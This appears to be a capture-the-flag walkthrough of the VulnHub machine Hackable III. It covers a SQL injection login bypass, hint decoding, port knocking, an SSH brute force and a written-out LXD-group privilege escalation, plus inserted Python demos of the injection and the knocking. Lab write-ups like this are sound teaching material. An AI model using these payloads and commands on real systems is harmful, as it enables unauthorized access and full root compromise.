By Beri Contraster

Hackable III Walkthrough – Vulnhub



Name: Hackable: III

Date release: 2 Jun 2021

Author: Elias Sousa

Series: Hackable

Difficulty: Medium


Welcome, reader. Today we'll pwn Hackable III from VulnHub. Let's start with an Nmap scan.


Web Server

Let's start with directory fuzzing using gobuster.


Looking through the page source of the home page, I found something interesting.


Here we can discover a potential username. The comment also tells us that a port has to be unlocked by port knocking, and a further hint points to steganography. So our task is to uncover the numeric sequence that opens the port when it is knocked, which means locating the files that hide those numbers. We should also pay attention to the login.html file mentioned just before the comment; following that link leads us to a login form.


Luckily, this form is vulnerable to SQL injection: the payload ' OR 1=1 # bypasses the login. Although the response is a blank page, its source contains the next hint.
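To make the bypass concrete, here is an added example (not code from the original post or from the Hackable III machine) of a login check that is vulnerable to exactly this injection, beside a parameterized version that is not. The table, the credentials and the shape of the query are constructed assumptions. SQLite is used so it runs offline, and because SQLite does not treat # as a comment, the payload is written with -- (the comment form that both SQLite and MySQL accept); the same string with # is tried as well to show that the comment terminator is engine-specific.

```python
import sqlite3

# Constructed sample data: one account in an in-memory SQLite database.
# Plaintext passwords are used only to keep the demo small; never store them this way.
SAMPLE_USERS = [("admin", "s3cret")]


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)")
    con.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Builds the query by string concatenation, so user input becomes SQL."""
    sql = (
        "SELECT 1 FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return con.execute(sql).fetchone() is not None


def login_safe(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Same check with bound parameters: the input is only ever data, never SQL."""
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone() is not None


def try_bypass(login, payload: str, password: str = "wrong") -> str:
    """Feed a payload as the username and report what the login routine did."""
    con = make_db()
    try:
        return "bypassed" if login(con, payload, password) else "rejected"
    except sqlite3.OperationalError:
        # The injected text broke the SQL syntax for this database engine.
        return "sql-error"
    finally:
        con.close()


if __name__ == "__main__":
    # -- is the comment form SQLite accepts; MySQL additionally accepts # as used on the page.
    print("vulnerable, ' OR 1=1 -- :", try_bypass(login_vulnerable, "' OR 1=1 -- "))
    print("vulnerable, ' OR 1=1 #  :", try_bypass(login_vulnerable, "' OR 1=1 #"))
    print("safe,       ' OR 1=1 -- :", try_bypass(login_safe, "' OR 1=1 -- "))
```

The vulnerable query ends up as `... WHERE username = '' OR 1=1 -- ' AND password = 'wrong'`, so the password check is commented away and the first row satisfies `1=1`. The parameterized version passes the same text as a bound value and finds no user with that literal name.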


Here we see a jpg file referenced in the header. Checking its location confirms that it is a valid path, which matches the steganography hint from earlier. I downloaded the file and extracted the data hidden inside it.


Steganography


That gave us one number, so our task now is to locate the other two. Going back to the gobuster results, I explored the /config directory.


Here we encounter another file containing base64-encoded text. Decoding it reveals a second number.


Under the /css path we come across a file named 2.txt. It contains a program written in the Brainfuck esoteric language, which we can decode by running it through a Brainfuck interpreter.


Running it reveals the third port.


Now armed with the three numbers, we can perform the port-knocking ritual. Once the ports had been knocked in the correct sequence, I checked whether the SSH port was open.
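The decoding and knocking steps above, as an added example in Python (not code from the original post): it decodes a base64 hint and a Brainfuck hint, pulls the port numbers out of the decoded text, knocks on them in order, and then checks whether SSH answers. The hint contents, the target address and the two-port sequence are constructed assumptions; the real files on the machine are not reproduced, and the number hidden in the jpg is not covered because extracting it needs a steganography tool rather than plain Python.

```python
import base64
import re
import socket
import time

# Constructed stand-ins for the hint files found under /config and /css.
# The real Hackable III hint contents are not reproduced here.
SAMPLE_BASE64_HINT = "cG9ydCAxMDAw"                       # decodes to "port 1000"
SAMPLE_BRAINFUCK_HINT = "++++++[>++++++++<-]>++.--..."    # prints "2000"


def decode_base64_hint(text: str) -> str:
    """Decode a base64 hint, tolerating stray whitespace and missing padding."""
    raw = "".join(text.split())
    raw += "=" * (-len(raw) % 4)
    return base64.b64decode(raw).decode("utf-8", errors="replace")


def run_brainfuck(program: str, max_steps: int = 1_000_000) -> str:
    """Minimal Brainfuck interpreter: 8-bit cells, 30000-cell tape, no stdin."""
    code = [c for c in program if c in "<>+-.,[]"]      # everything else is a comment
    stack, jumps = [], {}
    for i, c in enumerate(code):                          # pair up [ and ] in advance
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError("unbalanced ]")
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError("unbalanced [")
    tape, ptr, pc, steps, out = bytearray(30000), 0, 0, 0, []
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded; runaway program")
        c = code[pc]
        if c == ">":
            ptr += 1
        elif c == "<":
            ptr -= 1
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif c == ",":
            tape[ptr] = 0                                 # treat input as EOF
        elif c == "[" and tape[ptr] == 0:
            pc = jumps[pc]
        elif c == "]" and tape[ptr] != 0:
            pc = jumps[pc]
        if not 0 <= ptr < len(tape):
            raise IndexError("tape pointer out of range")
        pc += 1
    return "".join(out)


def extract_ports(text: str) -> list[int]:
    """Every plausible TCP port (1-65535) in the decoded text, in order of appearance."""
    return [int(n) for n in re.findall(r"\d+", text) if 1 <= int(n) <= 65535]


def knock(host: str, ports: list[int], delay: float = 0.5, timeout: float = 1.0) -> int:
    """Knock once on each port in order; returns how many knocks were sent.

    A knock daemon only watches for the incoming SYN, so a refused or timed-out
    connection is the normal outcome. Order and timing matter: daemons typically
    reset the sequence on a wrong port and let it expire after a few seconds.
    """
    sent = 0
    for port in ports:
        try:
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(timeout)
                s.connect_ex((host, port))                # result deliberately ignored
        except OSError:
            pass                                          # unreachable host etc.; keep the order
        sent += 1
        time.sleep(delay)
    return sent


def port_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """True only if a full TCP handshake succeeds, i.e. the port is now open."""
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            return s.connect_ex((host, port)) == 0
    except OSError:
        return False


if __name__ == "__main__":
    target = "192.168.56.101"                             # assumed lab address; substitute yours
    sequence = (extract_ports(decode_base64_hint(SAMPLE_BASE64_HINT))
                + extract_ports(run_brainfuck(SAMPLE_BRAINFUCK_HINT)))
    print("knock sequence:", sequence)
    print("ssh open before knocking:", port_open(target, 22))
    knock(target, sequence)
    print("ssh open after knocking:", port_open(target, 22))
```

If the port stays closed, the usual culprits are a wrong order, too long a pause between knocks, or a stateful firewall on the attacking side rewriting the probes; resending the sequence after a few seconds lets the daemon start fresh.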


We already have a username from the page source of the home page, and I also discovered a wordlist under /backup.


SSH Brute Force

It's time to use hydra against SSH with that username and the wordlist.


The attack was successful and we obtained the password for the user jubiscleudo.


USER

ROOT

Looking through the files, I found the password of the user hackable_3.


Checking the groups of hackable_3 revealed that the user is a member of the lxd group. Membership in that group is effectively root, because lxd lets its members create privileged containers that mount the host's filesystem.

I initialized LXD (lxd init) so that a storage pool exists for the new container.


Let's generate an LXC image on the attacking machine.

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine    # run as root; writes the alpine-*.tar.gz image used below into the current directory

I moved the generated image over to the target machine using Python's built-in HTTP server (python3 -m http.server on the attacker side) and imported it.


lxc image import ./alpine-v3.19-x86_64-20240311_2154.tar.gz --alias malicious
lxc image list    # confirm the image now shows up under the alias "malicious"

After verifying that the image was imported, we create a container from it with the security.privileged flag set and attach the host's root filesystem as a disk device. security.privileged=true runs the container without user-namespace isolation, so root inside the container is uid 0 on the host, and anything it writes to the mounted host disk is written as host root.



lxc init malicious privesc -c security.privileged=true    # create container "privesc" from the image, privileged
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true    # mount host / at /mnt/root
lxc start privesc
lxc exec privesc -- /bin/sh    # /bin/sh because the Alpine image has no bash

Once that is done, we start the container and open a shell in it. Inside, the host's entire filesystem sits under /mnt/root, so we can read or modify any host file as root.


Thanks for reading. If you have any questions please don't hesitate to ask.



1 comment


Beri Contraster, 12 Mar

This is actually good.